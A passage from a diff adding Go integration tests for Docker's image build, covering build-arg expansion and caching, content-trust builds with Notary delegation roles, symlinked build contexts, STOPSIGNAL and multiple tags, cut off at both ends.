exp) + } +} + +func (s *DockerSuite) TestBuildRUNErrMsg(c *check.C) { + // Test to make sure the bad command is quoted with just "s and + // not as a Go []string + name := "testbuildbadrunerrmsg" + _, out, err := buildImageWithOut(name, ` + FROM busybox + RUN badEXE a1 \& a2 a3`, false) // 
tab between a2 and a3 + if err == nil { + c.Fatal("Should have failed to build") + } + shell := "/bin/sh -c" + exitCode := "127" + if daemonPlatform == "windows" { + shell = "cmd /S /C" + // architectural - Windows has to start the container to determine the exe is bad, Linux does not + exitCode = "1" + } + exp := `The command '` + shell + ` badEXE a1 \& a2 a3' returned a non-zero code: ` + exitCode + if !strings.Contains(out, exp) { + c.Fatalf("RUN doesn't have the correct output:\nGot:%s\nExpected:%s", out, exp) + } +} + +func (s *DockerTrustSuite) TestTrustedBuild(c *check.C) { + repoName := s.setupTrustedImage(c, "trusted-build") + dockerFile := fmt.Sprintf(` + FROM %s + RUN [] + `, repoName) + + name := "testtrustedbuild" + + buildCmd := buildImageCmd(name, dockerFile, true) + s.trustedCmd(buildCmd) + out, _, err := runCommandWithOutput(buildCmd) + if err != nil { + c.Fatalf("Error running trusted build: %s\n%s", err, out) + } + + if !strings.Contains(out, fmt.Sprintf("FROM %s@sha", repoName[:len(repoName)-7])) { + c.Fatalf("Unexpected output on trusted build:\n%s", out) + } + + // We should also have a tag reference for the image. + if out, exitCode := dockerCmd(c, "inspect", repoName); exitCode != 0 { + c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out) + } + + // We should now be able to remove the tag reference. 
+ if out, exitCode := dockerCmd(c, "rmi", repoName); exitCode != 0 { + c.Fatalf("unexpected exit code inspecting image %q: %d: %s", repoName, exitCode, out) + } +} + +func (s *DockerTrustSuite) TestTrustedBuildUntrustedTag(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/build-untrusted-tag:latest", privateRegistryURL) + dockerFile := fmt.Sprintf(` + FROM %s + RUN [] + `, repoName) + + name := "testtrustedbuilduntrustedtag" + + buildCmd := buildImageCmd(name, dockerFile, true) + s.trustedCmd(buildCmd) + out, _, err := runCommandWithOutput(buildCmd) + if err == nil { + c.Fatalf("Expected error on trusted build with untrusted tag: %s\n%s", err, out) + } + + if !strings.Contains(out, "does not have trust data for") { + c.Fatalf("Unexpected output on trusted build with untrusted tag:\n%s", out) + } +} + +func (s *DockerTrustSuite) TestBuildContextDirIsSymlink(c *check.C) { + testRequires(c, DaemonIsLinux) + tempDir, err := ioutil.TempDir("", "test-build-dir-is-symlink-") + c.Assert(err, check.IsNil) + defer os.RemoveAll(tempDir) + + // Make a real context directory in this temp directory with a simple + // Dockerfile. + realContextDirname := filepath.Join(tempDir, "context") + if err := os.Mkdir(realContextDirname, os.FileMode(0755)); err != nil { + c.Fatal(err) + } + + if err = ioutil.WriteFile( + filepath.Join(realContextDirname, "Dockerfile"), + []byte(` + FROM busybox + RUN echo hello world + `), + os.FileMode(0644), + ); err != nil { + c.Fatal(err) + } + + // Make a symlink to the real context directory. + contextSymlinkName := filepath.Join(tempDir, "context_link") + if err := os.Symlink(realContextDirname, contextSymlinkName); err != nil { + c.Fatal(err) + } + + // Executing the build with the symlink as the specified context should + // *not* fail. 
+ if out, exitStatus := dockerCmd(c, "build", contextSymlinkName); exitStatus != 0 { + c.Fatalf("build failed with exit status %d: %s", exitStatus, out) + } +} + +func (s *DockerTrustSuite) TestTrustedBuildTagFromReleasesRole(c *check.C) { + testRequires(c, NotaryHosting) + + latestTag := s.setupTrustedImage(c, "trusted-build-releases-role") + repoName := strings.TrimSuffix(latestTag, ":latest") + + // Now create the releases role + s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) + s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) + s.notaryPublish(c, repoName) + + // push a different tag to the releases role + otherTag := fmt.Sprintf("%s:other", repoName) + dockerCmd(c, "tag", "busybox", otherTag) + + pushCmd := exec.Command(dockerBinary, "push", otherTag) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out)) + s.assertTargetInRoles(c, repoName, "other", "targets/releases") + s.assertTargetNotInRoles(c, repoName, "other", "targets") + + out, status := dockerCmd(c, "rmi", otherTag) + c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out)) + + dockerFile := fmt.Sprintf(` + FROM %s + RUN [] + `, otherTag) + + name := "testtrustedbuildreleasesrole" + + buildCmd := buildImageCmd(name, dockerFile, true) + s.trustedCmd(buildCmd) + out, _, err = runCommandWithOutput(buildCmd) + c.Assert(err, check.IsNil, check.Commentf("Trusted build failed: %s", out)) + c.Assert(out, checker.Contains, fmt.Sprintf("FROM %s@sha", repoName)) +} + +func (s *DockerTrustSuite) TestTrustedBuildTagIgnoresOtherDelegationRoles(c *check.C) { + testRequires(c, NotaryHosting) + + latestTag := s.setupTrustedImage(c, "trusted-build-releases-role") + repoName := strings.TrimSuffix(latestTag, ":latest") + + // Now create a non-releases delegation role + s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public) + 
s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private) + s.notaryPublish(c, repoName) + + // push a different tag to the other role + otherTag := fmt.Sprintf("%s:other", repoName) + dockerCmd(c, "tag", "busybox", otherTag) + + pushCmd := exec.Command(dockerBinary, "push", otherTag) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Trusted push failed: %s", out)) + s.assertTargetInRoles(c, repoName, "other", "targets/other") + s.assertTargetNotInRoles(c, repoName, "other", "targets") + + out, status := dockerCmd(c, "rmi", otherTag) + c.Assert(status, check.Equals, 0, check.Commentf("docker rmi failed: %s", out)) + + dockerFile := fmt.Sprintf(` + FROM %s + RUN [] + `, otherTag) + + name := "testtrustedbuildotherrole" + + buildCmd := buildImageCmd(name, dockerFile, true) + s.trustedCmd(buildCmd) + out, _, err = runCommandWithOutput(buildCmd) + c.Assert(err, check.NotNil, check.Commentf("Trusted build expected to fail: %s", out)) +} + +// Issue #15634: COPY fails when path starts with "null" +func (s *DockerSuite) TestBuildNullStringInAddCopyVolume(c *check.C) { + name := "testbuildnullstringinaddcopyvolume" + + volName := "nullvolume" + + if daemonPlatform == "windows" { + volName = `C:\\nullvolume` + } + + ctx, err := fakeContext(` + FROM busybox + + ADD null / + COPY nullfile / + VOLUME `+volName+` + `, + map[string]string{ + "null": "test1", + "nullfile": "test2", + }, + ) + c.Assert(err, check.IsNil) + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestBuildStopSignal(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support STOPSIGNAL yet + imgName := "test_build_stop_signal" + _, err := buildImage(imgName, + `FROM busybox + STOPSIGNAL SIGKILL`, + true) + c.Assert(err, check.IsNil) + res := inspectFieldJSON(c, imgName, "Config.StopSignal") + if res != `"SIGKILL"` { + c.Fatalf("Signal %s, 
expected SIGKILL", res) + } + + containerName := "test-container-stop-signal" + dockerCmd(c, "run", "-d", "--name", containerName, imgName, "top") + + res = inspectFieldJSON(c, containerName, "Config.StopSignal") + if res != `"SIGKILL"` { + c.Fatalf("Signal %s, expected SIGKILL", res) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArg(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + args := []string{"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)} + var dockerfile string + if daemonPlatform == "windows" { + // Bugs in Windows busybox port - use the default base image and native cmd stuff + dockerfile = fmt.Sprintf(`FROM `+minimalBaseImage()+` + ARG %s + RUN echo %%%s%% + CMD setlocal enableextensions && if defined %s (echo %%%s%%)`, envKey, envKey, envKey, envKey) + } else { + dockerfile = fmt.Sprintf(`FROM busybox + ARG %s + RUN echo $%s + CMD echo $%s`, envKey, envKey, envKey) + + } + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) + } + + containerName := "bldargCont" + out, _ := dockerCmd(c, "run", "--name", containerName, imgName) + out = strings.Trim(out, " \r\n'") + if out != "" { + c.Fatalf("run produced invalid output: %q, expected empty string", out) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgHistory(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + envDef := "bar1" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s=%s`, envKey, envDef) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access 
environment variable in output: %q expected: %q", out, envVal) + } + + out, _ := dockerCmd(c, "history", "--no-trunc", imgName) + outputTabs := strings.Split(out, "\n")[1] + if !strings.Contains(outputTabs, envDef) { + c.Fatalf("failed to find arg default in image history output: %q expected: %q", outputTabs, envDef) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgCacheHit(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + RUN echo $%s`, envKey, envKey) + + origImgID := "" + var err error + if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { + c.Fatal(err) + } + + imgNameCache := "bldargtestcachehit" + if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID != origImgID { + if err != nil { + c.Fatal(err) + } + c.Fatalf("build didn't use cache! expected image id: %q built image id: %q", origImgID, newImgID) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgCacheMissExtraArg(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + extraEnvKey := "foo1" + extraEnvVal := "bar1" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + ARG %s + RUN echo $%s`, envKey, extraEnvKey, envKey) + + origImgID := "" + var err error + if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { + c.Fatal(err) + } + + imgNameCache := "bldargtestcachemiss" + args = append(args, "--build-arg", fmt.Sprintf("%s=%s", extraEnvKey, extraEnvVal)) + if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID { + if err != nil { + c.Fatal(err) + } + c.Fatalf("build used cache, expected a miss!") + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgCacheMissSameArgDiffVal(c *check.C) { + imgName := 
"bldargtest" + envKey := "foo" + envVal := "bar" + newEnvVal := "bar1" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + RUN echo $%s`, envKey, envKey) + + origImgID := "" + var err error + if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { + c.Fatal(err) + } + + imgNameCache := "bldargtestcachemiss" + args = []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, newEnvVal), + } + if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID { + if err != nil { + c.Fatal(err) + } + c.Fatalf("build used cache, expected a miss!") + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgOverrideArgDefinedBeforeEnv(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + envValOveride := "barOverride" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + ENV %s %s + RUN echo $%s + CMD echo $%s + `, envKey, envKey, envValOveride, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgOverrideEnvDefinedBeforeArg(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + envValOveride := "barOverride" + args := []string{ + 
"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ENV %s %s + ARG %s + RUN echo $%s + CMD echo $%s + `, envKey, envValOveride, envKey, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldvarstest" + + wdVar := "WDIR" + wdVal := "/tmp/" + addVar := "AFILE" + addVal := "addFile" + copyVar := "CFILE" + copyVal := "copyFile" + envVar := "foo" + envVal := "bar" + exposeVar := "EPORT" + exposeVal := "9999" + userVar := "USER" + userVal := "testUser" + volVar := "VOL" + volVal := "/testVol/" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", wdVar, wdVal), + "--build-arg", fmt.Sprintf("%s=%s", addVar, addVal), + "--build-arg", fmt.Sprintf("%s=%s", copyVar, copyVal), + "--build-arg", fmt.Sprintf("%s=%s", envVar, envVal), + "--build-arg", fmt.Sprintf("%s=%s", exposeVar, exposeVal), + "--build-arg", fmt.Sprintf("%s=%s", userVar, userVal), + "--build-arg", fmt.Sprintf("%s=%s", volVar, volVal), + } + ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + ARG %s + WORKDIR ${%s} + ARG %s + ADD ${%s} testDir/ + ARG %s + COPY $%s testDir/ + ARG %s + ENV %s=${%s} + ARG %s + EXPOSE $%s + ARG %s + USER $%s + ARG %s + VOLUME ${%s}`, + wdVar, wdVar, addVar, addVar, copyVar, copyVar, envVar, envVar, + envVar, exposeVar, exposeVar, userVar, userVar, volVar, volVar), + map[string]string{ 
+ addVal: "some stuff", + copyVal: "some stuff", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(imgName, ctx, true, args...); err != nil { + c.Fatal(err) + } + + var resMap map[string]interface{} + var resArr []string + res := "" + res = inspectField(c, imgName, "Config.WorkingDir") + if res != filepath.ToSlash(filepath.Clean(wdVal)) { + c.Fatalf("Config.WorkingDir value mismatch. Expected: %s, got: %s", filepath.ToSlash(filepath.Clean(wdVal)), res) + } + + inspectFieldAndMarshall(c, imgName, "Config.Env", &resArr) + + found := false + for _, v := range resArr { + if fmt.Sprintf("%s=%s", envVar, envVal) == v { + found = true + break + } + } + if !found { + c.Fatalf("Config.Env value mismatch. Expected to exist: %s=%s, got: %v", + envVar, envVal, resArr) + } + + inspectFieldAndMarshall(c, imgName, "Config.ExposedPorts", &resMap) + if _, ok := resMap[fmt.Sprintf("%s/tcp", exposeVal)]; !ok { + c.Fatalf("Config.ExposedPorts value mismatch. Expected exposed port: %s/tcp, got: %v", exposeVal, resMap) + } + + res = inspectField(c, imgName, "Config.User") + if res != userVal { + c.Fatalf("Config.User value mismatch. Expected: %s, got: %s", userVal, res) + } + + inspectFieldAndMarshall(c, imgName, "Config.Volumes", &resMap) + if _, ok := resMap[volVal]; !ok { + c.Fatalf("Config.Volumes value mismatch. 
Expected volume: %s, got: %v", volVal, resMap) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgExpansionOverride(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldvarstest" + envKey := "foo" + envVal := "bar" + envKey1 := "foo1" + envValOveride := "barOverride" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + ENV %s %s + ENV %s ${%s} + RUN echo $%s + CMD echo $%s`, envKey, envKey, envValOveride, envKey1, envKey, envKey1, envKey1) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgUntrustedDefinedAfterUse(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + RUN echo $%s + ARG %s + CMD echo $%s`, envKey, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Contains(out, envVal) { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("able to access environment variable in output: %q expected to be missing", out) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); out != "\n" { + c.Fatalf("run produced invalid output: %q, expected empty string", out) + 
} +} + +func (s *DockerSuite) TestBuildBuildTimeArgBuiltinArg(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support --build-arg + imgName := "bldargtest" + envKey := "HTTP_PROXY" + envVal := "bar" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + RUN echo $%s + CMD echo $%s`, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); out != "\n" { + c.Fatalf("run produced invalid output: %q, expected empty string", out) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgDefaultOverride(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + envValOveride := "barOverride" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envValOveride), + } + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s=%s + ENV %s $%s + RUN echo $%s + CMD echo $%s`, envKey, envVal, envKey, envKey, envKey, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 1 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + } + + containerName := "bldargCont" + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgUnconsumedArg(c *check.C) { + imgName := "bldargtest" + 
envKey := "foo" + envVal := "bar" + args := []string{ + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + } + dockerfile := fmt.Sprintf(`FROM busybox + RUN echo $%s + CMD echo $%s`, envKey, envKey) + + warnStr := "[Warning] One or more build-args" + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); !strings.Contains(out, warnStr) { + c.Fatalf("build completed without warning: %q %q", out, err) + } else if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + +} + +func (s *DockerSuite) TestBuildBuildTimeArgEnv(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + args := []string{ + "build", + "--build-arg", fmt.Sprintf("FOO1=fromcmd"), + "--build-arg", fmt.Sprintf("FOO2="), + "--build-arg", fmt.Sprintf("FOO3"), // set in env + "--build-arg", fmt.Sprintf("FOO4"), // not set in env + "--build-arg", fmt.Sprintf("FOO5=fromcmd"), + // FOO6 is not set at all + "--build-arg", fmt.Sprintf("FOO7=fromcmd"), // should produce a warning + "--build-arg", fmt.Sprintf("FOO8="), // should produce a warning + "--build-arg", fmt.Sprintf("FOO9"), // should produce a warning + ".", + } + + dockerfile := fmt.Sprintf(`FROM busybox + ARG FOO1=fromfile + ARG FOO2=fromfile + ARG FOO3=fromfile + ARG FOO4=fromfile + ARG FOO5 + ARG FOO6 + RUN env + RUN [ "$FOO1" == "fromcmd" ] + RUN [ "$FOO2" == "" ] + RUN [ "$FOO3" == "fromenv" ] + RUN [ "$FOO4" == "fromfile" ] + RUN [ "$FOO5" == "fromcmd" ] + # The following should not exist at all in the env + RUN [ "$(env | grep FOO6)" == "" ] + RUN [ "$(env | grep FOO7)" == "" ] + RUN [ "$(env | grep FOO8)" == "" ] + RUN [ "$(env | grep FOO9)" == "" ] + `) + + ctx, err := fakeContext(dockerfile, nil) + c.Assert(err, check.IsNil) + defer ctx.Close() + + cmd := exec.Command(dockerBinary, args...) 
+ cmd.Dir = ctx.Dir + cmd.Env = append(os.Environ(), + "FOO1=fromenv", + "FOO2=fromenv", + "FOO3=fromenv") + out, _, err := runCommandWithOutput(cmd) + if err != nil { + c.Fatal(err, out) + } + + // Now check to make sure we got a warning msg about unused build-args + i := strings.Index(out, "[Warning]") + if i < 0 { + c.Fatalf("Missing the build-arg warning in %q", out) + } + + out = out[i:] // "out" should contain just the warning message now + + // These were specified on a --build-arg but no ARG was in the Dockerfile + c.Assert(out, checker.Contains, "FOO7") + c.Assert(out, checker.Contains, "FOO8") + c.Assert(out, checker.Contains, "FOO9") +} + +func (s *DockerSuite) TestBuildBuildTimeArgQuotedValVariants(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envKey1 := "foo1" + envKey2 := "foo2" + envKey3 := "foo3" + args := []string{} + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s="" + ARG %s='' + ARG %s="''" + ARG %s='""' + RUN [ "$%s" != "$%s" ] + RUN [ "$%s" != "$%s" ] + RUN [ "$%s" != "$%s" ] + RUN [ "$%s" != "$%s" ] + RUN [ "$%s" != "$%s" ]`, envKey, envKey1, envKey2, envKey3, + envKey, envKey2, envKey, envKey3, envKey1, envKey2, envKey1, envKey3, + envKey2, envKey3) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } +} + +func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows does not support ARG + imgName := "bldargtest" + envKey := "foo" + envKey1 := "foo1" + envKey2 := "foo2" + args := []string{} + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s= + ARG %s="" + ARG %s='' + RUN [ "$%s" == "$%s" ] + RUN [ "$%s" == "$%s" ] + RUN [ "$%s" == "$%s" ]`, envKey, envKey1, envKey2, envKey, envKey1, envKey1, envKey2, envKey, envKey2) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } +} + +func 
(s *DockerSuite) TestBuildBuildTimeArgDefintionWithNoEnvInjection(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + args := []string{} + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + RUN env`, envKey) + + if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envKey) != 1 { + if err != nil { + c.Fatalf("build failed to complete: %q %q", out, err) + } + c.Fatalf("unexpected number of occurrences of the arg in output: %q expected: 1", out) + } +} + +func (s *DockerSuite) TestBuildNoNamedVolume(c *check.C) { + volName := "testname:/foo" + + if daemonPlatform == "windows" { + volName = "testname:C:\\foo" + } + dockerCmd(c, "run", "-v", volName, "busybox", "sh", "-c", "touch /foo/oops") + + dockerFile := `FROM busybox + VOLUME ` + volName + ` + RUN ls /foo/oops + ` + _, err := buildImage("test", dockerFile, false) + c.Assert(err, check.NotNil, check.Commentf("image build should have failed")) +} + +func (s *DockerSuite) TestBuildTagEvent(c *check.C) { + since := daemonUnixTime(c) + + dockerFile := `FROM busybox + RUN echo events + ` + _, err := buildImage("test", dockerFile, false) + c.Assert(err, check.IsNil) + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "type=image") + events := strings.Split(strings.TrimSpace(out), "\n") + actions := eventActionsByIDAndType(c, events, "test:latest", "image") + var foundTag bool + for _, a := range actions { + if a == "tag" { + foundTag = true + break + } + } + + c.Assert(foundTag, checker.True, check.Commentf("No tag event found:\n%s", out)) +} + +// #15780 +func (s *DockerSuite) TestBuildMultipleTags(c *check.C) { + dockerfile := ` + FROM busybox + MAINTAINER test-15780 + ` + cmd := exec.Command(dockerBinary, "build", "-t", "tag1", "-t", "tag2:v2", + "-t", "tag1:latest", "-t", "tag1", "--no-cache", "-") + cmd.Stdin = strings.NewReader(dockerfile) + _, err := runCommand(cmd) + c.Assert(err, 
check.IsNil) + + id1, err := getIDByName("tag1") + c.Assert(err, check.IsNil) + id2, err := getIDByName("tag2:v2") + c.Assert(err, check.IsNil) + c.Assert(id1, check.Equals, id2) +} + +// #17290 +func (s *DockerSuite) TestBuildCacheBrokenSymlink(c *check.C) { + name := "testbuildbrokensymlink" + ctx, err := fakeContext(` + FROM busybox + COPY . ./`, + map[string]string{ + "foo": "bar", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + err = os.Symlink(filepath.Join(ctx.Dir, "nosuchfile"), filepath.Join(ctx.Dir, "asymlink")) + c.Assert(err, checker.IsNil) + + // warm up cache + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + // add new file to context, should invalidate cache + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "newfile"), []byte("foo"), 0644) + c.Assert(err, checker.IsNil) + + _, out, err := buildImageFromContextWithOut(name, ctx, true) + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Not(checker.Contains), "Using cache") + +} + +func (s *DockerSuite) TestBuildFollowSymlinkToFile(c *check.C) { + name := "testbuildbrokensymlink" + ctx, err := fakeContext(` + FROM busybox + COPY asymlink target`, + map[string]string{ + "foo": "bar", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + c.Assert(err, checker.IsNil) + + id, err := buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "--rm", id, "cat", "target") + c.Assert(out, checker.Matches, "bar") + + // change target file should invalidate cache + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644) + c.Assert(err, checker.IsNil) + + id, out, err = buildImageFromContextWithOut(name, ctx, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), "Using cache") + + out, _ = dockerCmd(c, "run", "--rm", id, "cat", "target") + c.Assert(out, checker.Matches, "baz") +} + +func (s *DockerSuite) 
TestBuildFollowSymlinkToDir(c *check.C) { + name := "testbuildbrokensymlink" + ctx, err := fakeContext(` + FROM busybox + COPY asymlink /`, + map[string]string{ + "foo/abc": "bar", + "foo/def": "baz", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + c.Assert(err, checker.IsNil) + + id, err := buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "--rm", id, "cat", "abc", "def") + c.Assert(out, checker.Matches, "barbaz") + + // change target file should invalidate cache + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo/def"), []byte("bax"), 0644) + c.Assert(err, checker.IsNil) + + id, out, err = buildImageFromContextWithOut(name, ctx, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), "Using cache") + + out, _ = dockerCmd(c, "run", "--rm", id, "cat", "abc", "def") + c.Assert(out, checker.Matches, "barbax") + +} + +// TestBuildSymlinkBasename tests that target file gets basename from symlink, +// not from the target file. 
+func (s *DockerSuite) TestBuildSymlinkBasename(c *check.C) { + name := "testbuildbrokensymlink" + ctx, err := fakeContext(` + FROM busybox + COPY asymlink /`, + map[string]string{ + "foo": "bar", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + c.Assert(err, checker.IsNil) + + id, err := buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "--rm", id, "cat", "asymlink") + c.Assert(out, checker.Matches, "bar") + +} + +// #17827 +func (s *DockerSuite) TestBuildCacheRootSource(c *check.C) { + name := "testbuildrootsource" + ctx, err := fakeContext(` + FROM busybox + COPY / /data`, + map[string]string{ + "foo": "bar", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + // warm up cache + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, checker.IsNil) + + // change file, should invalidate cache + err = 